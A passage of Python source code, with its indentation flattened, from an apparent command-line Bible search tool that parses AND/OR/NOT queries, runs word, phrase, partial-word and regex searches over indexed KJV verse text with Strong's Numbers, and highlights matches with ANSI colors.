# match_text = strip_color_regx.sub('', match.group())
# return word_regx.sub(highlight_text, match_text)
verse_text = verse_text.strip()
# Apply each highlighting regular expression to the text.
for regx in regx_list:
verse_text = regx.sub(highlight_group, verse_text)
return verse_text
def build_highlight_regx(search_list, case_sensitive, sloppy=False,
color_tag='\033\[[\\\\d+;]*m', extra_tag='\033'):
""" Build a regular expression and highlight string to colorize the
items in search_list as they appear in a verse.
"""
if not search_list:
return []
regx_list = []
    # Extra word boundary to catch ansi color escape sequences.
escaped_word_bound = '(?:{0}|\\\\b)+'.format(color_tag)
word_bound = '(?:{0}|\\b)+'.format(color_tag)
# Extra space filler to pass over ansi color escape sequences.
extra_space = '|{0}|{1}'.format(color_tag, extra_tag)
# print(word_bound, extra_space, '(?:\033\[[\d+;]*m|\\b)+')
for item in search_list:
item = item.strip()
is_regex = (('*' in item and ' ' not in item) or item.startswith('&'))
if ('*' in item and ' ' not in item) and not item.startswith('&'):
# Build a little regular expression to highlight partial words.
item = item[1:] if item[0] in '!^+|' else item
item = item.replace('*', '\w*')
item = r'{0}({1}){0}'.format(word_bound, item)
if item.startswith('&'):
# Just use a regular expression. ('&' marks the term as a regular
# expression.)
item = item[1:]
regx_list.append(Search.search_terms_to_regex(item, case_sensitive,
word_bound=escaped_word_bound, extra_space=extra_space,
sloppy=(sloppy or '~' in item), is_regex=is_regex))
return regx_list
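# A hypothetical end-to-end sketch (not part of the original module): build
# highlight regexes for one search term and apply them to an already rendered
# verse line.  The verse text below is only an illustration.
def _example_highlighting():
    regx_list = build_highlight_regx(['faith'], case_sensitive=False)
    line = 'Hebrews 11:1: Now faith is the substance of things hoped for...'
    return highlight_search_terms(line, regx_list, highlight_text)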
def mod_lookup(mod, items):
""" Looks up items in a module and returns the formated text.
"""
item_lookup = Lookup(mod)
    # Separate all elements with commas.
item_list = ','.join(items.split()).split(',')
text_list = []
for item in item_list:
item_text = item_lookup.get_formatted_text(item)
text_list.append('\033[1m%s\033[m:\n%s' % (item, item_text))
return '\n\n'.join(text_list)
class StdoutRedirect(object):
""" Redirect stdout to a specified output function.
"""
def __init__(self, output_func, *args):
""" Set the output function and get the extra arguments to pass to it.
"""
self._output_func = output_func
self._args = args
self._old_stdout = sys.stdout
def write(self, data):
""" Write data to the output function.
"""
if data.strip():
self._output_func(data, *self._args)
def __enter__(self):
""" Change sys.stdout to this class.
"""
try:
sys.stdout = self
return self
except Exception as err:
print("Error in __enter__: %s" % err, file=sys.stderr)
return None
def __exit__(self, exc_type, exc_value, traceback):
""" Change sys.stdout back to its old value.
"""
try:
sys.stdout = self._old_stdout
if exc_type:
return False
return True
except Exception as err:
print("Error in __exit__: %s" % err, file=sys.stderr)
return False
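# A minimal usage sketch (an assumption, not part of the original module):
# collect anything printed inside the block instead of writing it to stdout.
def _example_stdout_redirect():
    captured = []
    with StdoutRedirect(captured.append):
        print('redirected output')
    return captured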
class IndexedVerseTextIter(object):
""" An iterable object for accessing verses in the Bible. Maybe it will
    be easier, maybe not.
"""
def __init__(self, reference_iter, strongs=False, morph=False,
module='KJV', italic_markers=False, added=True,
paragraph=True, notes=False, path=''):
""" Initialize.
"""
reg_list = []
if not strongs:
reg_list.append(r'\s*<([GH]\d+)>')
if not morph:
reg_list.append(r'\s*\{([\w-]+)\}')
if not added:
reg_list.append(r'\s?<i>\s?(.*?)\s?</i>')
if not italic_markers:
reg_list.append(r'(<i>\s?|\s?</i>)')
if not paragraph:
reg_list.append(r'\s?<p>\s?(.*?)\s?</p>')
else:
reg_list.append(r'(<p>\s?|\s?</p>)')
reg_str = r'(?:%s)' % r'|'.join(reg_list)
self._clean_regex = re.compile(reg_str, re.S)
self._notes_regex = re.compile(r'\s?<n>\s?(.*?)\s?</n>', re.S)
self._notes_str = ' (Notes: \\1)' if notes else ''
self._index_dict = IndexDict('%s' % module, path)
self._ref_iter = reference_iter
def next(self):
""" Returns the next verse reference and text.
"""
return self.__next__()
def __next__(self):
""" Returns a tuple of the next verse reference and text.
"""
# Retrieve the next reference.
verse_ref = next(self._ref_iter)
# Set the verse and render the text.
verse_text = self._get_text(verse_ref)
return (verse_ref, verse_text.strip())
def __iter__(self):
""" Returns an iterator of self.
"""
return self
def _get_text(self, verse_ref):
""" Returns the verse text. Override this to produce formatted verse
text.
"""
verse_text = self._index_dict[verse_ref]
verse_text = self._clean_regex.sub('', verse_text)
verse_text = self._notes_regex.sub(self._notes_str, verse_text)
return verse_text
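# A short usage sketch (an assumption, not part of the original module): the
# iterator yields (reference, text) pairs for each requested verse, assuming
# an index for the module has already been built.
def _example_indexed_iter():
    refs = ['John 3:16', 'Genesis 1:1']  # hypothetical reference list
    for verse_ref, verse_text in IndexedVerseTextIter(iter(refs), module='KJV'):
        print('%s: %s' % (verse_ref, verse_text))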
class CombinedParse(object):
""" A parser for simple combined search parsing.
((in OR tree) AND the) AND (house OR bush) =>
['in the house', 'in the bush', 'tree the house', 'tree the bush']
Also it has a NOT word list.
created NOT (and OR but) => ['created'] ['and', 'but']
"""
def __init__(self, arg_str):
""" Initialize the parser and parse the arg string.
"""
self._arg_str = arg_str
self._arg_list = arg_str.split()
parsed_list = self.parse_string(list(arg_str))
self._word_list, self._not_list = self.parse_list(parsed_list)
    # Make the results accessible via read-only properties.
word_list = property(lambda self: self._word_list)
not_list = property(lambda self: self._not_list)
def parse_list(self, arg_list):
""" Parse a list such as ['created', 'NOT', ['and', 'OR', 'but']] into
search_args = ['created'] not_list = ['and', 'but']
"""
# The list we're working on building.
working_list = []
# The list of words not to include.
not_list = []
for i in arg_list:
# Skip 'OR's
if i == 'OR':
continue
if isinstance(i, list):
# A list was found so parse it and get the results.
temp_list, temp_not_list = self.parse_list(i)
# Add the returned not list to the current not list.
not_list.extend(temp_not_list)
if working_list:
if working_list[-1] == 'AND':
# Pop the 'AND' off the end of the list.
working_list.pop()
                    # Combine each element of the working list with each
                    # element of the returned list, and replace the working
                    # list with those combinations.
# (i.e. working_list = ['this', 'that']
# temp_list = ['tree', 'house']
# result = ['this tree', 'this house',
# 'that tree', 'that house']
working_list = ['%s %s' % j \
for j in product(working_list, temp_list)]
elif working_list[-1] == 'NOT':
# Take the 'NOT' off to show we've processed it.
working_list.pop()
# Add the returned list to the NOT list.
not_list.extend(temp_list)
else:
                        # Just extend the working list with the returned list.
working_list.extend(temp_list)
else:
                    # Just extend the working list with the returned list.
working_list.extend(temp_list)
else:
if i == 'AND':
# Put the 'AND' on the list for later processing.
working_list.append(i)
elif working_list:
if working_list[-1] == 'AND':
# Take the 'AND' off the list.
working_list.pop()
# Combine all the elements of working_list with i, and
# replace working list with the resulting list.
# (i.e. working_list = ['he', 'it'] i = 'said'
# result = ['he said', 'it said']
working_list = ['%s %s' % (j, i) for j in working_list]
elif working_list[-1] == 'NOT':
# Remove the 'NOT'.
working_list.pop()
# Add the word to the not list.
not_list.append(i)
else:
# Add the word to the working list.
working_list.append(i)
else:
# Add the word to the working list.
working_list.append(i)
# Split and then combine all the strings in working_list.
# Basically removes runs of whitespace.
working_list = [' '.join(i.split()) for i in working_list]
# Return the final list and not list.
return working_list, not_list
def parse_parenthesis(self, arg_list):
""" Recursively processes strings in parenthesis converting them
to nested lists of strings.
"""
# The return list.
return_list = []
        # Temporary string.
temp_str = ''
while arg_list:
# Get the next character.
c = arg_list.pop(0)
if c == '(':
                # An opening parenthesis was found, so split the current
                # string at the spaces, put the words in the return list,
                # and reset the string.
if temp_str:
return_list.extend(temp_str.split())
temp_str = ''
# Process from here to the closing parenthesis.
return_list.append(self.parse_parenthesis(arg_list))
elif c == ')':
# The parenthesis is closed so return back to the calling
# function.
break
else:
                # Append the current non-parenthesis character to the string.
temp_str += c
if temp_str:
# Split and add the string to the return list.
return_list.extend(temp_str.split())
# Return what we found.
return return_list
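    # Illustrative example (not from the original source): if arg_list holds
    # the remaining characters of "and OR but) ..." after the opening '(' has
    # already been consumed, this method should return ['and', 'OR', 'but']
    # and leave everything after the ')' in arg_list.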
def parse_string(self, arg_list):
""" Parse a combined search arg string. Convert a string such as:
'created NOT (and OR but)' => ['created', 'NOT', ['and', 'OR', 'but']]
"""
# This does the same thing only using json.
#
# Regular expression to group all words.
#word_regx = re.compile(r'\b(\w*)\b')
        # Put quotes around all words and replace opening parenthesis with
        # brackets, then put all of that in brackets.
#temp_str = '[%s]' % word_regx.sub('"\\1"', arg_str).replace('(', '[')
# Replace closing parenthesis with brackets and replace a '" ' with
# '", '.
#temp_str = temp_str.replace(')', ']').replace('" ', '",')
# finally replace '] ' with '], '. The end result should be a valid
# json string that can be converted to a list.
#temp_str = temp_str.replace('] ', '],')
# Convert the string to a list.
#return_list = json.loads(temp_str)
#return return_list
# The return list.
return_list = []
# Temporary string.
temp_str = ''
while arg_list:
# Pop the next character.
c = arg_list.pop(0)
if c == '(':
                # A parenthesis was found, so store and reset the string,
                # then parse what is in the parenthesis.
if temp_str:
return_list.extend(temp_str.split())
temp_str = ''
return_list.append(self.parse_parenthesis(arg_list))
else:
# Append the non parenthesis character to the string.
temp_str += c
if temp_str:
# Store the final string in the list.
return_list.extend(temp_str.split())
#info_print(return_list)
# Return the list.
return return_list
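    # Rough usage sketch (mirrors the examples in the class docstring above):
    #     parser = CombinedParse("created NOT (and OR but)")
    #     parser.word_list  ->  ['created']
    #     parser.not_list   ->  ['and', 'but']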
class Search(object):
""" Provides a simple way of searching an IndexDict for verses.
"""
# To check for spaces.
_whitespace_regx = re.compile(r'\s')
# Cleanup regular expressions.
_non_alnum_regx = re.compile(r'[^\w\*<>\{\}\(\)-]')
_fix_regx = re.compile(r'\s+')
# Match strongs numbers.
_strongs_regx = re.compile(r'[<]?(\b[GH]\d+\b)[>]?', re.I)
# It needs to match with braces or it will catch all capitalized
    # words and words with '-'s in them.
_morph_regx = re.compile(r'[\(\{](\b[\w-]+\b)[\}\)]', re.I)
_word_regx = re.compile(r'\b([\w\\-]+)\b')
_space_regx = re.compile(r'\s+')
_non_word_regx = re.compile(r'[<>\(\)]')
_fix_strongs = classmethod(lambda c, m: '<%s>' % m.groups()[0].upper())
_fix_morph = classmethod(lambda c, m: '{%s}' % m.groups()[0].upper())
# Escape the morphological tags.
_escape_morph = classmethod(lambda c, m: \
'\{%s\}' % re.escape(m.groups()[0]).upper())
def __init__(self, module='KJV', path='', multiword=False):
""" Initialize the search.
"""
# The index dictionary.
self._index_dict = IndexDict(module, path)
self._module_name = module
self._multi = multiword
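    # Minimal usage sketch (an illustration, assuming an indexed 'KJV' module
    # as used throughout this file):
    #     search = Search(module='KJV')
    #     refs = search.multiword_search('light day')
    #     # refs is a set of verse references, e.g. containing 'Genesis 1:5'.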
@classmethod
def search_terms_to_regex(cls, search_terms, case_sensitive,
word_bound='\\\\b', extra_space='',
sloppy=False, is_regex=False):
""" Build a regular expression from the search_terms to match a verse
in the Bible.
"""
# Set the flags for the regular expression.
flags = re.I if not case_sensitive else 0
if is_regex:
reg_str = search_terms
info_print('\nUsing regular expression: %s\n' % reg_str, tag=2)
try:
return re.compile(reg_str, flags)
except Exception as err:
print("An error occured while compiling the highlight "
"regular expression %s: %s." % (reg_str, err),
" There will be no highlighting.\n", file=sys.stderr)
return re.compile(r'')
# This will skip words.
not_words_str = r'\b\w+\b'
# This will skip Strong's Numbers.
not_strongs_str = r'<[^>]*>'
        # This will skip Morphological Tags.
not_morph_str = r'\{[^\}]*\}'
# This will skip all punctuation. Skipping ()'s is a problem for
# searching Morphological Tags, but it is necessary for the
# parenthesized words. May break highlighting.
not_punct_str = r'[\s,\?\!\.;:\\/_\(\)\[\]"\'-]'
# This will skip ansi color.
not_color_str = r'\033\[[\d;]*m'
# Match all *'s
star_regx = re.compile(r'\*')
# Hold the string that fills space between search terms.
space_str = ''
        # Set the *'s aside so we can replace them with '\w*' later.
temp_str, word_count = star_regx.subn(r'_star_', search_terms)
# Hack to get rid of unwanted characters.
temp_str = cls._non_alnum_regx.sub(' ', temp_str).split()
temp_str = ' '.join(temp_str)
# Phrases will have spaces in them
phrase = bool(cls._whitespace_regx.search(temp_str))
# Escape the morphological tags, and also find how many there are.
temp_str, morph_count = cls._morph_regx.subn(cls._escape_morph,
temp_str)
# Make all Strong's Numbers uppercase, also find how many there are.
temp_str, strongs_count = cls._strongs_regx.subn(cls._fix_strongs,
temp_str)
# Select all words.
#repl = '(\\\\b\\1\\\\b)'
# This works:
# temp_str, word_count = \
# cls._word_regx.subn('{0}(\\1){0}'.format(word_bound), temp_str)
repl = '(?:{0}(\\1){0})'.format(word_bound)
temp_str, word_count = cls._word_regx.subn(repl, temp_str)
# Replace what used to be *'s with '\w*'.
temp_str = temp_str.replace('_star_', '\w*')
# All the Strong's and Morphology were changed in the previous
# substitution, so if that number is greater than the number of
# Strong's plus Morphology then there were words in the search terms.
# I do this because I don't know how to only find words.
words_found = (strongs_count + morph_count) < word_count
if phrase:
# Build the string that is inserted between the items in the
# search string.
space_str = r'(?:%s%s' % (not_punct_str, extra_space)
if not bool(strongs_count) or sloppy:
# Skip over all Strong's Numbers.
space_str = r'%s|%s' % (space_str, not_strongs_str)
if not bool(morph_count) or sloppy:
# Skip all Morphological Tags.
space_str = r'%s|%s' % (space_str, not_morph_str)
if not words_found or bool(morph_count) or bool(strongs_count) or \
sloppy:
# Skip words. If word attributes are in the search we can
# skip over words and still keep it a phrase.
space_str = r'%s|%s' % (space_str, not_words_str)
# Finally make it not greedy.
space_str = r'%s)*?' % space_str
else:
space_str = ''
# Re-combine the search terms with the regular expression string
# between each element.
reg_str = space_str.join(temp_str.split())
info_print('\nUsing regular expression: %s\n' % reg_str, tag=2)
try:
return re.compile(reg_str, flags)
except Exception as err:
print("An error occured while compiling the highlight "
"regular expression %s: %s." % (reg_str, err),
" There will be no highlighting.\n", file=sys.stderr)
return re.compile(r'')
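    # Illustrative sketch (not from the original source): for a plain word
    # phrase the returned pattern matches the words in order with word
    # boundaries, optionally skipping punctuation, Strong's Numbers, and
    # Morphological Tags between them, e.g.:
    #     regx = Search.search_terms_to_regex('in the beginning', False)
    #     bool(regx.search('In the beginning God created ...'))  ->  True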
def _sorted_iter(self, verse_ref_set):
""" Returns an iterator over a sorted version of verse_ref_set.
"""
# Speed up the iteration by first sorting the range.
return iter(sorted(verse_ref_set, key=sort_key))
def _clean_text(self, text):
""" Return a clean (only alphanumeric) text of the provided string.
"""
        # Do we have to use two regular expressions to do this?
# Replace all non-alphanumeric characters with a space.
temp_text = self._non_alnum_regx.sub(' ', text)
# Replace one or more spaces with one space.
clean_text = self._fix_regx.sub(' ', temp_text)
return clean_text.strip()
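    # Illustrative example (not from the original source):
    #     self._clean_text('What hath God wrought!')  ->  'What hath God wrought'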
def _fix_strongs_morph(self, search_terms):
""" Make any Strong's or Morphology uppercase, put parenthesis around
the Morphological Tags, and put <>'s around the Strong's Numbers.
"""
        # Capitalize all Strong's Numbers and make sure they are in <>'s.
temp_str = self._strongs_regx.sub(self._fix_strongs, search_terms)
# Capitalize all morphological tags and make sure they are in
# parenthesis.
temp_str = self._morph_regx.sub(self._fix_morph, temp_str)
return temp_str
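    # Illustrative example (not from the original source):
    #     self._fix_strongs_morph('g1234 (n-asm)')  ->  '<G1234> {N-ASM}'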
def _process_search(func):
""" Returns a wrapper function that processes the search terms, calls
the wrapped function, and, if applicable, confines the resulting verse
set to a range.
"""
@wraps(func)
def wrapper(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" Process the search terms according to the wrapped functions
requirements, then apply the range, if given, to the returned set
of verses.
"""
if func.__name__ in ['sword_search']:
if not Sword:
print("Sword library not found.")
return
if not isinstance(search_terms, str):
# Combine the terms for use by the different methods.
search_terms = ' '.join(search_terms)
# Get a valid set of verse references that conform to the passed
# range.
range_set = parse_verse_range(range_str)
if func.__name__ not in ['regex_search', 'partial_word_search']:
# Try to catch and fix any Strong's Numbers or Morphological
# Tags.
search_terms = self._fix_strongs_morph(search_terms)
# Regular expression and combined searches get the search terms as
# they were passed.
if func.__name__ in ['multiword_search', 'anyword_search',
'phrase_search', 'mixed_phrase_search']:
# Get rid of any non-alphanumeric or '-' characters from
# the search string.
search_str = self._clean_text(search_terms).strip()
if strongs or morph:
# Strong's numbers and Morphological tags are all
# uppercase. This is only required if the Morphological
# Tags were not surrounded by parenthesis.
search_str = search_str.upper().strip()
else:
search_str = search_terms
# Get the set of found verses.
found_set = func(self, search_str, strongs, morph, added,
case_sensitive, range_set)
# The phrase, regular expression, and combined searches apply the
# range before searching, so only multi-word and any-word searches
# have it applied here.
if func.__name__ in ['multiword_search', 'anyword_search',
'partial_word_search']:
if range_set:
found_set.intersection_update(range_set)
return found_set
# Return wrapper function.
return wrapper
@_process_search
def combined_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" combined_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str=''): ->
Perform a combined search. Search terms could be
'created NOT (and OR but)' and it would find all verses with the word
'created' in them and remove any verse that had either 'and' or 'but.'
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for '%s'..." % search_terms, tag=1)
# Process the search_terms.
arg_parser = CombinedParse(search_terms)
# Get the list of words and/or phrases to include.
word_list = arg_parser.word_list
# Get the list of words and/or phrases to NOT include.
not_list = arg_parser.not_list
phrase_search = self.phrase_search
multiword_search = self.multiword_search
def combine_proc(str_list):
""" Performs combined search on the strings in str_list, and
returns a set of references that match.
"""
and_it = False
temp_set = set()
for word in str_list:
# A '+' before or after a word means it should have a phrase
# search done on it and the words with it.
if '+' in word:
# Do a phrase search on the word string.
result_set = phrase_search(word.replace('+', ' '), strongs,
morph, case_sensitive,
range_str)
elif word == '&':
# Combine the next search results with this one.
and_it = True
continue
else:
# Do a multi-word search on the word string.
result_set = multiword_search(word, strongs, morph,
case_sensitive, range_str)
if and_it:
# The previous word said to find verses that match both.
temp_set.intersection_update(result_set)
and_it = False
else:
# Only keep the verses that have either one group or the
# other but not both.
temp_set.symmetric_difference_update(result_set)
return temp_set
# Remove any verses that have the NOT words in them.
found_set = combine_proc(word_list).difference(combine_proc(not_list))
return found_set
@_process_search
def combined_phrase_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" combined_phrase_search(self, search_terms, strongs=False,
morph=False, case_sensitive=False, range_str=''): ->
Perform a combined phrase search. Search terms could be
'created NOT (and AND but)' and it would find all verses with the word
'created' in them and remove any verse that had the phrase 'and but.'
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for '%s'..." % search_terms, tag=1)
# Process the search_terms.
arg_parser = CombinedParse(search_terms)
# Get the list of words and/or phrases to include.
word_list = arg_parser.word_list
# Get the list of words and/or phrases to NOT include.
not_list = arg_parser.not_list
phrase_search = self.phrase_search
def combine_proc(str_list):
""" Performs combined phrase search on the strings in str_list, and
returns a set of references that match.
"""
temp_set = set()
for word in str_list:
# Do a phrase search on the word string.
result_set = phrase_search(word.replace('+', ' '), strongs,
morph, case_sensitive,
range_str)
# Include all the verses that have any of the word groups.
temp_set.update(result_set)
return temp_set
# Remove any verses that have the NOT words in them.
found_set = combine_proc(word_list).difference(combine_proc(not_list))
return found_set
@_process_search
def multiword_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" multiword_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a multiword search using the search_terms.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with all these words "
"'%s'..." % ', '.join(search_terms.split()), tag=1)
# All that needs to be done is find all references with all the
# searched words in them.
found_set = self._index_dict.value_intersect(search_terms.split(),
case_sensitive)
return found_set
@_process_search
def eitheror_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" eitheror_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a search returning any verse with one and only one of the terms
searched for.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with one and not all of these words "
"'%s'..." % ', '.join(search_terms.split()), tag=1)
# Any verse with one and only one of the searched words.
found_set = self._index_dict.value_sym_diff(search_terms.split(),
case_sensitive)
return found_set
@_process_search
def anyword_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" anyword_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a search returning any verse with one or more of the search
terms.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with any of these words "
"'%s'..." % ', '.join(search_terms.split()), tag=1)
# Any verse with one or more of the searched words.
found_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
return found_set
@_process_search
def partial_word_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" partial_word_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a search returning any verse with one or more words matching
        the partial words given in the search terms. Partial words are marked
        with *'s (e.g. '*guil*' will match any word with 'guil' in it such as
        'guilt' or 'beguile').
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with any of these partial words "
"'%s'..." % ', '.join(search_terms.split()), tag=1)
#found_set = self._index_dict.value_union(
#self._words_from_partial(search_terms, case_sensitive),
#case_sensitive)
search_list = search_terms.split()
found_set = self._index_dict.from_partial(search_list, case_sensitive)
return found_set
def _words_from_partial(self, partial_word_list, case_sensitive=False):
""" Search through a list of partial words and yield words that match.
"""
flags = re.I if not case_sensitive else 0
# Split the search terms and search through each word key in the index
# for any word that contains the partial word.
word_list = partial_word_list.split()
for word in self._index_dict['_words_']:
for partial_word in word_list:
# A Regular expression that matches any number of word
# characters for every '*' in the term.
reg_str = '\\b%s\\b' % partial_word.replace('*', '\w*')
try:
word_regx = re.compile(reg_str, flags)
except Exception as err:
print('There is a problem with the regular expression '
'%s: %s' % (reg_str, err), file=sys.stderr)
exit()
if word_regx.match(word):
yield word
def _process_phrase(func):
""" Returns a wrapper function for wrapping phrase like searches.
"""
@wraps(func)
def wrapper(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" Gets a regular expression from the wrapped function, then
builds a set of verse references to search, finally it calls the
searching function with the regular expression and the verse
reference iterator, and returns the resulting set of references.
"""
search_regx = func(self, search_terms, strongs, morph, added,
case_sensitive, range_str)
# First make sure we are only searching verses that have all the
# search terms in them.
search_list = search_terms.split()
if '*' in search_terms:
ref_set = self._index_dict.from_partial(search_list,
case_sensitive,
common_limit=5000)
else:
ref_set = self._index_dict.value_intersect(search_list,
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
# No need to search for a single word phrase.
if len(search_terms.split()) == 1:
return ref_set
# Sort the list so it may be a little faster. Only needed if we're
# using the sword module to look them up.
ref_iter = self._sorted_iter(ref_set)
            # Only enable Strong's and Morphological matching if the search
            # terms actually contain them.
strongs = bool(self._strongs_regx.search(search_terms))
morph = bool(self._morph_regx.search(search_terms))
return self.find_from_regex(ref_iter, search_regx, strongs, morph)
return wrapper
@_process_search
@_process_phrase
def ordered_multiword_search(self, search_terms, strongs=False,
morph=False, added=True, case_sensitive=False,
range_str=''):
""" ordered_multiword_search(self, search_terms, strongs=False,
morph=False, case_sensitive=False, range_str='') ->
Perform an ordered multiword search. Like a multiword search, but all
the words have to be in order.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with these words in order "
"'%s'..." % search_terms, tag=1)
return self.search_terms_to_regex(search_terms, case_sensitive,
sloppy=True)
@_process_search
@_process_phrase
def phrase_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" phrase_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a phrase search.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with this phrase "
"'%s'..." % search_terms, tag=1)
# Make all the terms the same case if case doesn't matter.
flags = re.I if not case_sensitive else 0
if strongs:
# Match strongs phrases.
search_reg_str = search_terms.replace(' ', r'[^<]*')
elif morph:
# Match morphological phrases.
search_reg_str = search_terms.replace(' ', r'[^\{]*')
else:
# Match word phrases
search_reg_str = '\\b%s\\b' % search_terms.replace(' ',
r'\b(<[^>]*>|\{[^\}]*\}|\W)*\b')
# Make a regular expression from the search terms.
return re.compile(search_reg_str, flags)
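    # Rough sketch of the word-phrase case above (an illustration, not a
    # quote from the source): a search for 'in the beginning' compiles to a
    # pattern along the lines of
    #     \bin\b(<[^>]*>|\{[^\}]*\}|\W)*\bthe\b(<[^>]*>|\{[^\}]*\}|\W)*\bbeginning\b
    # so Strong's Numbers, Morphological Tags, and punctuation can fall
    # between the words without breaking the phrase.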
@_process_search
@_process_phrase
def mixed_phrase_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" mixed_phrase_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a phrase search.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with this phrase "
"'%s'..." % search_terms, tag=1)
# Make a regular expression from the search terms.
return self.search_terms_to_regex(search_terms, case_sensitive)
@_process_search
def regex_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" regex_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a regular expression search.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for regular expression '%s'..." % search_terms,
tag=1)
# re.I is case insensitive.
flags = re.I if not case_sensitive else 0
try:
# Make a regular expression from the search_terms.
search_regx = re.compile(r'%s' % search_terms, flags)
except Exception as err:
print('There is a problem with the regular expression "%s": %s' % \
(search_terms, err), file=sys.stderr)
exit()
if range_str:
# Only search through the supplied range.
ref_iter = self._sorted_iter(range_str)
else:
# Search the entire Bible.
ref_iter = VerseIter('Genesis 1:1')
return self.find_from_regex(ref_iter, search_regx, strongs, morph,
tag=1, try_clean=True)
def find_from_regex(self, ref_iter, search_regex, strongs=False,
morph=False, added=True, tag=3, try_clean=False):
""" Iterates through all the verses in the ref iter iterator and
        returns a set of verse references whose text matches search_regex.
"""
# Get an iterator that will return tuples
# (verse_reference, verse_text).
verse_iter = IndexedVerseTextIter(ref_iter, strongs=strongs,
morph=morph, added=added,
module=self._module_name)
found_set = set()
for verse_ref, verse_text in verse_iter:
info_print('\033[%dD\033[KSearching...%s' % \
(len(verse_ref) + 20, verse_ref), end='', tag=tag)
# Search for matches in the verse text.
if search_regex.search(verse_text):
found_set.add(verse_ref)
elif try_clean and not strongs and not morph:
                # Should we do this, or should we trust that the user knows
                # what punctuation is in the verses?
clean_verse_text = self._clean_text(verse_text)
if search_regex.search(clean_verse_text):
found_set.add(verse_ref)
info_print("...Done.", tag=tag)
return found_set
def mixed_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" mixed_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a mixed search.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
found_set = set()
not_set = set()
and_set = set()
or_set = set()
xor_set = set()
combine_dict = {
'!': not_set.update,
'+': and_set.intersection_update,
'|': or_set.update,
'^': xor_set.symmetric_difference_update,
}
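        # Illustrative example (not from the original source): with terms
        # such as ['+light', '!darkness', '|day', '^night'] the leading
        # character routes each term's result set through the matching
        # combining function above.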
for term in search_terms:
if term[0] in '!+^|':
# Set the correct combining function, and cleanup the item.
if term[0] == '+' and not and_set:
# All of these verses go in the output.
combine_func = and_set.update
else:
combine_func = combine_dict[term[0]]
term = term[1:]
else:
if self._multi and found_set:
# If multiword is default and found_set is not empty
# make all search terms appear in the output.
combine_func = found_set.intersection_update
else:
# Any of these verses could be in the output
combine_func = found_set.update
if term.startswith('&'):
# Allow regular expression searching.
term = term[1:]
search_func = self.regex_search
elif ' ' in term:
# Search term is a quoted string, so treat it like a phrase.
if term.startswith('~'):
# ~'s trigger ordered multiword or sloppy phrase search.
term = term[1:]
search_func = self.ordered_multiword_search
else:
search_func = self.mixed_phrase_search
elif '*' in term:
# Search for partial words.
search_func = self.partial_word_search
else:
# A single word should be (multi/any)-word.
